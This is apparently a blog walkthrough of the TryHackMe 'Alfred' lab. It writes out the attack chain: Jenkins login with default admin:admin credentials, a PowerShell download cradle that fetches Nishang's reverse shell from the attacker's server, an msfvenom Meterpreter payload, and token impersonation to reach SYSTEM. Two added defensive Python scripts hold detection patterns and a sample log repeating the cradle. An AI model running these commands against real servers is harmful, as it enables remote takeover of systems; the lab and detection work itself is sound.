The Alfred room on TryHackMe focuses on exploiting Jenkins, a commonly misconfigured automation tool that developers use for continuous integration and deployment.

Alfred is a subscription-only room.

Initial access

This task requires you to deploy the machine and load up Nishang to gain initial access. Nishang is a framework and collection of PowerShell scripts and payloads for offensive security, written by nikhil_mitt.

Nmap (TCP)

Start by scanning the machine with nmap. This way, we can see what ports are open.

nmap 10.10.160.207

This reveals three open ports: 80, 3389 and 8080.

Get Credentials

Referring back to the nmap scan, there are two HTTP services, one on port 80 and another on port 8080. Let's check these out.

10.10.160.207:80

10.10.160.207:8080

This task requires us to crack the Jenkins login, on port 8080 specifically.

Jenkins default credentials

A simple Google search reveals the default admin username for Jenkins is "admin".

After toying around with a few admin:password candidates (first trying some Batman-related passwords, e.g. Bruce, Wayne, Joker, etc.), I stumbled on the password before loading up some brute force tools.

The password is... you guessed it... admin.

The username:password flag is admin:admin.

Jenkins exploit

Now that we've gained access to Jenkins, let's look for some remote code execution vulnerabilities.

The Nishang script first has to be served over HTTP so that the target can download it, so we start a Python web server in the directory that contains it.

The Powershell script we need to download is available at the top of the page.

Start Python server

python3 -m http.server

This serves the directory the command was run from on port 8000 on all interfaces (0.0.0.0:8000).

It is also reachable on your own machine's IP address, which you can find with the ip addr command.

So let’s download the PowerShell script (above) and then run the given script. Then, the Jenkins console can download the PowerShell script and run it on the target machine.

RCE Vulnerability

TryHackMe provides a command for us to run on the host.

powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

Of course, swap your-ip and your-port.

So, at first, I toyed with the Script Console, attempting to exploit some Java scripts to download and run the above PowerShell script.

But I gave up on this after figuring out that you can run a shell script in the build options for the project.

The script here will run on build.

Wait for it to finish.

Then we need to start a netcat listener on the port we gave in the command. Run the following:

nc -l -p 1337

Then build the Jenkins project again.
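A build step that fetches and executes a script from an HTTP server, as above, leaves a distinctive trace in the job's console output and in the job configuration. The following Python is an added example, not from the TryHackMe room or the original post, showing how a defender could scan Jenkins console logs or build-step commands for such download cradles. The console log lines and the 10.0.0.5 address are constructed for the example.

```python
import re

# Indicators of PowerShell download-and-execute cradles and payload staging
# in Jenkins build steps. The pattern names are labels chosen for this example.
CRADLE_PATTERNS = {
    "download_string": re.compile(r"DownloadString\s*\(", re.I),
    "download_file": re.compile(r"DownloadFile\s*\(", re.I),
    "webclient": re.compile(r"New-Object\s+(?:System\.)?Net\.WebClient", re.I),
    "iex": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "reverse_shell": re.compile(r"Invoke-PowerShellTcp|-Reverse\b", re.I),
    "start_process": re.compile(r"\bStart-Process\b", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)

# Constructed Jenkins console output (not captured from a real build).
SAMPLE_CONSOLE_LOG = r"""Started by user admin
Building in workspace C:\Program Files (x86)\Jenkins\workspace\project
[project] $ cmd /c call C:\Users\bruce\AppData\Local\Temp\jenkins123.bat
C:\Program Files (x86)\Jenkins\workspace\project>powershell iex (New-Object Net.WebClient).DownloadString('http://10.0.0.5:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.0.0.5 -Port 1337
Finished: SUCCESS
"""


def scan_build_step(command: str) -> dict:
    """Return which cradle indicators a single build-step command matches,
    plus any URLs it references."""
    indicators = [name for name, pat in CRADLE_PATTERNS.items() if pat.search(command)]
    return {
        "indicators": indicators,
        "urls": URL_RE.findall(command),
        "suspicious": bool(indicators),
    }


def scan_console_log(lines) -> list:
    """Scan console output line by line and return the suspicious lines
    together with their 1-based line numbers."""
    findings = []
    for number, line in enumerate(lines, start=1):
        result = scan_build_step(line)
        if result["suspicious"]:
            findings.append({"line": number, **result})
    return findings


if __name__ == "__main__":
    for finding in scan_console_log(SAMPLE_CONSOLE_LOG.splitlines()):
        print(f"line {finding['line']}: {finding['indicators']} -> {finding['urls']}")
```

The same scan_build_step function can be pointed at the command text of each "Execute Windows batch command" step in a job's config.xml, which is where the persistence of this technique actually lives; the console log only shows it once a build has run.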

And.. we’re in!

From here, we need to find the user.txt flag.

User flag

Using some general knowledge of Windows, we cd .. up through the directory tree.

Eventually we reach something that looks promising: C:\Users\bruce.

Finally, we find the user.txt file, and with it the flag.

Meterpreter

Task 2 has us generate an msfvenom payload by running the following command.

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe

I'd tried to download and run the msfvenom payload via the previous shell that we'd gotten, but to no avail.

The flag for this task is the size of the msfvenom payload, which we can see by running ls -la: it's 73802 bytes.

Instead, I found success by running it through the same build options we exploited earlier, but with the new payload.

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.11.8.219:8000/theJoker.exe','theJoker.exe')"

Before going through the build process, we need to launch the Metasploit listener: run msfconsole, use exploit/multi/handler, and set the payload to the one we gave msfvenom, windows/meterpreter/reverse_tcp.

Now that we're listening, we can run the build on Jenkins.

After rebuilding, we see the meterpreter session opens successfully.

Privilege Escalation

Ugh, this was a bit of a nightmare.

So, flip the build options BACK to the original netcat route we took, and start a listener with nc -l -p 1234.

Once you get a shell, run the PowerShell command given by TryHackMe.

powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"

Make sure not to cd out of the folder.

Then run Start-Process "theJoker.exe" to launch the msfvenom payload.

Make sure exploit/multi/handler is running in msfconsole to catch the shell.

From the Meterpreter session, run the shell command to drop into a Windows command shell.

Then we can see all privileges with whoami /priv.
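The output of whoami /priv is also what a defender would review when auditing the account a Jenkins service runs as, since enabled token privileges are what make the impersonation step that follows possible. The Python below is an added example, not from the post or the room: it parses constructed whoami /priv output (not captured from the Alfred machine) and flags enabled privileges from a high-risk set chosen for the example.

```python
import re

# Token privileges that, when enabled for a service or non-administrative
# account, are commonly abused for privilege escalation. Set chosen for this example.
HIGH_RISK_PRIVILEGES = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeDebugPrivilege",
    "SeBackupPrivilege",
    "SeRestorePrivilege",
    "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege",
}

# Constructed `whoami /priv` output, not captured from a real machine.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
"""

# One privilege row: name, free-text description, then the State column.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(output: str) -> dict:
    """Map each privilege name in `whoami /priv` output to its State column."""
    privileges = {}
    for line in output.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privileges[m.group(1)] = m.group(2)
    return privileges


def risky_enabled(privileges: dict) -> list:
    """Return the enabled privileges that belong to the high-risk set, sorted."""
    return sorted(name for name, state in privileges.items()
                  if state == "Enabled" and name in HIGH_RISK_PRIVILEGES)


if __name__ == "__main__":
    privs = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    for name in risky_enabled(privs):
        print(f"high-risk privilege enabled: {name}")
```

Running this against the account a Jenkins agent or master service actually runs as is a cheap audit: a build system that does not need these privileges should be running under an account that does not hold them.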

To escape the shell, just hit Ctrl+C.

Then, we can load the incognito module to exploit two of the enabled privileges, using load incognito.

Let's see what tokens are available with list_tokens -g.

From here, we see that the BUILTIN\Administrators tokens are available and can be impersonated.

After running the command impersonate_token BUILTIN\\ADMINISTRATORS we get the required output. Note that the double backslash escapes the backslash.

The above confirms we’re impersonating NT AUTHORITY\SYSTEM.

However, even though we are impersonating a privileged token, our current process may not carry that authority. So let's grab the PID of the services.exe process and migrate into it.

Fire off the command ps | grep services.exe

Then take the PID number (probably different for you) and run the migrate command to "move to" that process, which is owned by the user we're impersonating.

Now that we've escalated privileges, the root flag is in C:\Windows\System32\config: cd there, then cat root.txt.
